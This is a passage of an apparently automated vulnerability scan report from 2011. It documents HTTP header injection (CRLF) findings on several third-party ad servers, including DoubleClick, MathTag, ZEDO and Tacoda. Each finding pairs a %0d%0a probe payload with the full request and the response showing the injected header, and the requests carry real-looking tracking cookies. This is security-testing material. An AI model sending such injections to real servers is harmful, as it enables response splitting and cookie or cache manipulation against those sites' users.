Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/6e559
80ecbb7f1f7/q1.q.sanfrancisco/be_bus;net=q1;u=,q1-79848849_1304957835,11f8f328940989e,sports,am.h-am.b-q1.polit_h-q1.none_h-q1.ent_h-q1.food_h-q1.sports_h-dx.16-dx.23-dx.17-mm.ag1-mm.ak1-mm.am1-mm.aq1-cm.ent_h-cm.music_h-cm.weath_h;;sz=300x250;net=q1;ord1=456064;contx=sports;dc=w;btg=am.h;bt:
Date: Mon, 09 May 2011 16:17:55 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.16. http://ad.doubleclick.net/dot.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload b5a47%0d%0ad07bd8a0c5f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifb5a47%0d%0ad07bd8a0c5f?3e314dba94 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://addelivery.thestreet.com/afr.php?zoneid=67&ActiveProducts=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifb5a47
d07bd8a0c5f:
Date: Mon, 09 May 2011 16:18:10 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.17. http://ad.doubleclick.net/pfadx/247wallstreet_cim/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/pfadx/247wallstreet_cim/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the DCLK_imp response header. The payload 9df39%0d%0a7ed4c1f2024 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/247wallstreet_cim/;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;ord=1304957879467?&9df39%0d%0a7ed4c1f2024=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=247wallst
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
DCLK_imp: v7;x;235887422;0-0;14;56356068;24/24;41525949/41543736/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;ic17=1;ic16=1;ic12=1;ac17=1;ac16=1;ac14=1;ac12=1;ac10=1;pc1=1;pc4=1;ic9=1;ac5=1;ic3=1;ic1=1;ac8=1;ic5=1;AG=1;AK=1;AM=1;AQ=1;ac18=1;ac2=1;ic23=1;pc5=1;ic13=1;sz=24x24;dcmt=text/html;;9df39
7ed4c1f2024=1;~cs=x:
Date: Mon, 09 May 2011 16:19:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 1584

DoubleClick.onAdLoaded('MediaAlert', {"impression": "http://ad.doubleclick.net/imp;v7;x;235887422;0-0;14;56356068;24/24;41525949/41543736/1;;~aopt=2/1/22/0;~okv=;secure=false;position=1;ic22=1;ic19=1;
...[SNIP]...

1.18. http://ad.doubleclick.net/pfadx/247wallstreet_cim/ [secure parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/pfadx/247wallstreet_cim/

Issue detail

The value of the secure request parameter is copied into the DCLK_imp response header. The payload 99458%0d%0a69021077a22 was submitted in the secure parameter. This caused a response containing an injected HTTP header.

Request

GET /pfadx/247wallstreet_cim/;secure=99458%0d%0a69021077a22 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.meebo.com/cim/sandbox.php?lang=en&version=v92_cim_11_8_0&protocol=http%3A&network=247wallst
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: video/x-ms-asf
Content-Length: 237
Cache-Control: no-cache
Pragma: no-cache
Date: Mon, 09 May 2011 16:19:14 GMT
Expires: Mon, 09 May 2011 16:19:14 GMT
DCLK_imp: v7;x;44306;0-0;0;56356068;0/0;0/0/0;;~aopt=2/1/22/0;~okv=;secure=99458
69021077a22;~cs=m:

<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b02/0/0/%2a/l;44306;0-0;0;56356068;783-50/50;0/0/0;;~aopt=2/1/22/0;~sscs=%3f"><img src="http://s0.2mdn.net/viewad/817-grey.gif" border=0 al
...[SNIP]...

1.19. http://bidder.mathtag.com/iframe/notify [exch parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bidder.mathtag.com
Path:	/iframe/notify

Issue detail

The value of the exch request parameter is copied into the x-mm-debug response header. The payload 86474%0d%0a56088ff1fb7 was submitted in the exch parameter. This caused a response containing an injected HTTP header.

Request

GET /iframe/notify?exch=86474%0d%0a56088ff1fb7&id=5aW95q2jLzEvUTBGRlUwVkpOMEYwYjJoYVFVSXhkVlpSUjA5elRsaFZhMlJKL05HUmhZamRrTXpVdFlqRmtNaTA1TVRWaExXUXpZekF0T1dRMU4yWTVZelkyWWpBMy8yNjc0MjQ5NzM0NDk3NzkzNDIvMTA0MTE3LzEwMDQ3MC80L1EzQW1fQ25wZlFVZ053MjlWUjRoVHJfZDVnM292Ui15UDhSMG5oaUZzMUEv/ZNrdNx0NVA6VSNc1LeujOvmCxgU&price=TcgTjQAOvDcK7F7N8JVAzvjkick14rWP9VP_iw&dck=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DB4pSfjRPITbf4Os29sQfOgdWED9zvj_EBkoO-vBH0woOTEgAQARgBIAA4AVCAx-HEBGDJhoWJiKSEEIIBF2NhLXB1Yi05MzczMTYyNjExMjgzOTM1oAHg6pnsA7IBG3d3dy5hbWVyaWNhbmJhbmtpbmduZXdzLmNvbboBCTQ2OHg2MF9hc8gBCdoBcmh0dHA6Ly93d3cuYW1lcmljYW5iYW5raW5nbmV3cy5jb20vMjAxMS8wNS8wOS9tb3JnYW4tc3RhbmxleS1tcy1hbmFseXN0cy11cGdyYWRlLWNpdGlncm91cC1jLXNoYXJlcy10by1vdmVyd2VpZ2h0L5gC5BTAAgTIAtbBjA6oAwHoA5sJ6ANr6AOQBugD8wj1AwIAAMSABpDLtK3bxsOLwAE%26num%3D1%26sig%3DAGiWqtw7FvYd3iyAFCM8hGCD_oBh5TZM1Q%26client%3Dca-pub-9373162611283935%26adurl%3D HTTP/1.1
Host: bidder.mathtag.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-9373162611283935&output=html&h=60&slotname=0333420210&w=468&lmt=1304972079&flash=10.2.154&url=http%3A%2F%2Fwww.americanbankingnews.com%2F2011%2F05%2F09%2Fmorgan-stanley-ms-analysts-upgrade-citigroup-c-shares-to-overweight%2F&dt=1304957836570&bpp=4&shv=r20110427&jsv=r20110427&prev_slotnames=7652782417&correlator=1304957836604&frm=0&adk=628584490&ga_vid=1453194814.1304957837&ga_sid=1304957837&ga_hid=1755860427&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=45&biw=1050&bih=968&fu=0&ifi=2&dtd=126&xpc=FtwIPZ6DB3&p=http%3A//www.americanbankingnews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; ts=1304949603; mt_mop=4:1304955494

Response

HTTP/1.1 404 Not found
Date: Mon, 09 May 2011 16:18:10 GMT
Server: MMBD/3.5.5
Content-Type: text/html; charset=utf-8
Content-Length: 18
x-mm-debug: exchange not found - 86474
56088ff1fb7
x-mm-host: ewr-bidder-x5
Connection: keep-alive

Request not found

1.20. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [$ parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-406/c5/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into the Set-Cookie response header. The payload e611c%0d%0acb9292c7a17 was submitted in the $ parameter. This caused a response containing an injected HTTP header.

Request

GET /bar/v16-406/c5/jsc/fm.js?c=24&a=0&f=&n=1452&r=13&d=15&q=&$=e611c%0d%0acb9292c7a17&s=0&z=0.3088119877502322 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; FFCap=1581B1219,212244|0,1,1; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; FFgeo=2241452; ZCBC=1; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1; FFcat=1099,2,9; FFad=0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1452:e611c
cb9292c7a17;expires=Tue, 10 May 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1452,24,15:1099,2,9;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0:0;expires=Tue, 10 May 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1;expires=Wed, 08 Jun 2011 16:17:20 GMT;path=/;domain=.zedo.com;
ETag: "867f4fde-838c-4a1e244fdb0c0"
Vary: Accept-Encoding
X-Varnish: 545954245 545953947
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=91
Expires: Mon, 09 May 2011 16:18:51 GMT
Date: Mon, 09 May 2011 16:17:20 GMT
Connection: close
Content-Length: 16709

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',e611c
cb
...[SNIP]...

1.21. http://c7.zedo.com/utils/ecSet.js [v parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/utils/ecSet.js

Issue detail

The value of the v request parameter is copied into the Set-Cookie response header. The payload 2275d%0d%0a2cdaf9be399 was submitted in the v parameter. This caused a response containing an injected HTTP header.

Request

GET /utils/ecSet.js?v=2275d%0d%0a2cdaf9be399&d=.zedo.com HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDX=29; ZEDOIDA=5ajh4goBADQAAFjiiCYAAABN~042311; __qca=P0-591305981-1304358415303; PI=h749620Za805982Zc305002744%2C305002744Zs263Zt1122; FFAbh=847B162,20|313_1#365; ZFFAbh=845B826,20|1451_856#376Z1117_846#366Z798_845#365; ZCBC=1; FFChanCap=1573B496,121#543485#876543#675101:1219,16#736039,18#736041:1099,2#702968|0,15,1:1,15,1:5,15,1:0,9,1:0,9,1:0,17,1; FFCap=1581B1219,212244:1452,206974|0,1,1:0,9,1; FFgeo=2241452; FFad=0:0:0:0:0:0:0; FFcat=305,5676,50:1452,2,15:1452,3,14:1452,13,27:1452,13,14:1452,24,15:1099,2,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 1
Content-Type: application/x-javascript
Set-Cookie: 2275d
2cdaf9be399;expires=Wed, 08 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path=/;
ETag: "2971d9-1f5-47f29204ac3c0"
Vary: Accept-Encoding
X-Varnish: 1443353591 1443353341
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=4468
Date: Mon, 09 May 2011 16:18:24 GMT
Connection: close

1.22. http://tacoda.at.atwola.com/rtx/r.gif [N cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.gif

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload be00b%0d%0a5c8c1155d0c was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.gif?cmd=ESV&si=18201&pi=-&xs=3 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/918?ret=html&phint=fa%3Dit&phint=ind%3Dbusinessservices&phint=sen%3Dexec&phint=pro%3DE6D&phint=pro%3DT8P&limit=4&r=67489331
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; eadx=x; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305561775|60130^1^1305560226|50220^1^1304989381|53615^1^1305562676|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756|52576^1^1305562676|52766^1^1305562676; Tsid=0^1304955421^1304959676|13015^1304956956^1304958756|12174^1304956975^1304958775|18139^1304957876^1304959676; TData=99999|^|51134|56281|50086|50085|53380|60490|60512|57149|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56673|60146|56780|56969|56835|56232|56761|56768|56681|54057|56148; N=2:a847d6095e047baa644f1ef7d852edf7,a847d6095e047baa644f1ef7d852edf7be00b%0d%0a5c8c1155d0c; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTcxNDk6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY2NzM6NjAxNDY6NTY3ODA6NTY5Njk6NTY4MzU6NTYyMzI=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:20:04 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 16:35:04 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 16:20:04 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305561775|60130^1^1305560226|50220^1^1304989381|53615^1^1305562676|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756|52576^1^1305562676|52766^1^1305562676|57126^1^1305562804; path=/; expires=Mon, 16-May-11 16:20:04 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955421^1304959804|13015^1304956956^1304958756|12174^1304956975^1304958775|18139^1304957876^1304959676|18201^1304958004^1304959804; path=/; expires=Mon, 09-May-11 16:50:04 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|60740|57130|53380|60490|60512|60489|57149|60515|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|60146|52576|56969|56835|56780|57372|56761; expires=Thu, 03-May-12 16:20:04 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:a847d6095e047baa644f1ef7d852edf7be00b
5c8c1155d0c,aff3a0d34f874c485c6aff040641c190; expires=Thu, 03-May-12 16:20:04 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NjA3NDA6NTcxMzA6NTMzODA6NjA0OTA6NjA1MTI6NjA0ODk6NTcxNDk6NjA1MTU6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NjAxNDY6NTI1NzY=; expires=Thu, 03-May-12 16:20:04 GMT; path=/; domain=.at.atwola.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

1.23. http://tacoda.at.atwola.com/rtx/r.gif [si parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.gif

Issue detail

The value of the si request parameter is copied into the Set-Cookie response header. The payload efe9e%0d%0ac36f0b48aa1 was submitted in the si parameter. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.gif?cmd=ESV&si=efe9e%0d%0ac36f0b48aa1&pi=-&xs=3 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://tags.bluekai.com/site/918?ret=html&phint=fa%3Dit&phint=ind%3Dbusinessservices&phint=sen%3Dexec&phint=pro%3DE6D&phint=pro%3DT8P&limit=4&r=67489331
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; eadx=x; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305561775|60130^1^1305560226|50220^1^1304989381|53615^1^1305562676|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756|52576^1^1305562676|52766^1^1305562676; Tsid=0^1304955421^1304959676|13015^1304956956^1304958756|12174^1304956975^1304958775|18139^1304957876^1304959676; TData=99999|^|51134|56281|50086|50085|53380|60490|60512|57149|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56673|60146|56780|56969|56835|56232|56761|56768|56681|54057|56148; N=2:a847d6095e047baa644f1ef7d852edf7,a847d6095e047baa644f1ef7d852edf7; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTcxNDk6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY2NzM6NjAxNDY6NTY3ODA6NTY5Njk6NTY4MzU6NTYyMzI=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:20:02 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Mon, 09 May 2011 16:35:02 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; path=/; expires=Thu, 03-May-12 16:20:02 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=60183^1^1305561775|60130^1^1305560226|50220^1^1304989381|53615^1^1305562676|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756|52576^1^1305562676|52766^1^1305562676|57126^1^1305562802; path=/; expires=Mon, 16-May-11 16:20:02 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1304955421^1304959802|13015^1304956956^1304958756|12174^1304956975^1304958775|18139^1304957876^1304959676|efe9e
c36f0b48aa1^1304958002^1304959802; path=/; expires=Mon, 09-May-11 16:50:02 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|51134|56281|50086|50085|60740|57130|53380|60490|60512|60489|57149|60515|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|60146|52576|56969|56835|56780|57372|56761; expires=Thu, 03-May-12 16:20:02 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:a847d6095e047baa644f1ef7d852edf7,aff3a0d34f874c485c6aff040641c190; expires=Thu, 03-May-12 16:20:02 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NjA3NDA6NTcxMzA6NTMzODA6NjA0OTA6NjA1MTI6NjA0ODk6NTcxNDk6NjA1MTU6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NjAxNDY6NTI1NzY=; expires=Thu, 03-May-12 16:20:02 GMT; path=/; domain=.at.atwola.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

1.24. http://tacoda.at.atwola.com/rtx/r.js [N cookie] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://tacoda.at.atwola.com
Path:	/rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload bc012%0d%0a927f6eda590 was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=DTX:DWT:DUY&si=18139&pi=L&xs=3&pu=http%253A//an.tacoda.net/an/18139/bizo_multi.htm%253Fpid%253D224%2526u%253Dfa%253Afa_it%252Csen%253Asen_exec%252Cind%253Aind_bizser%2526ifu%253Dhttp%25253A//js.bizographics.com/support/partner.html%25253Fpid%25253D224%252526u%25253Dfa%25253Afa_it%25252Csen%25253Asen_exec%25252Cind%25253Aind_bizser&df=1&v=5.5&cb=61142 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://an.tacoda.net/an/18139/bizo_multi.htm?pid=224&u=fa:fa_it,sen:sen_exec,ind:ind_bizser
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB8055D6E651A440C6EAF39F00069A8; eadx=x; ATTACID=a3Z0aWQ9MTZyNG9wcTF0dmxrbWw=; ANRTT=60183^1^1305561775|60130^1^1305560226|50220^1^1304989381|53615^1^1305130724|50215^1^1305161824|50229^1^1305161861|60203^1^1305203973|50280^1^1305161928|60194^1^1305161911|50224^1^1305161938|60190^1^1305161946|50213^1^1305554387|60146^1^1305561756; Tsid=0^1304955421^1304958775|18181^1304955421^1304957226|13015^1304956956^1304958756|12174^1304956975^1304958775; TData=99999|^|51134|56281|50086|50085|53380|60490|60512|57149|50963|52615|60491|50507|53656|55401|60509|54255|60506|57094|54243|50961|54209|52841|51182|56419|56673|60146|56780|56969|56835|56232|56761|56768|56681|54057|56148; N=2:cce56ea51bb938bc8d726cc79d6aee7f,a847d6095e047baa644f1ef7d852edf7bc012%0d%0a927f6eda590; ATTAC=a3ZzZWc9OTk5OTk6NTExMzQ6NTYyODE6NTAwODY6NTAwODU6NTMzODA6NjA0OTA6NjA1MTI6NTcxNDk6NTA5NjM6NTI2MTU6NjA0OTE6NTA1MDc6NTM2NTY6NTU0MDE6NjA1MDk6NTQyNTU6NjA1MDY6NTcwOTQ6NTQyNDM6NTA5NjE6NTQyMDk6NTI4NDE6NTExODI6NTY0MTk6NTY2NzM6NjAxNDY6NTY3ODA6NTY5Njk6NTY4MzU6NTYyMzI=

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 16:19:32 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
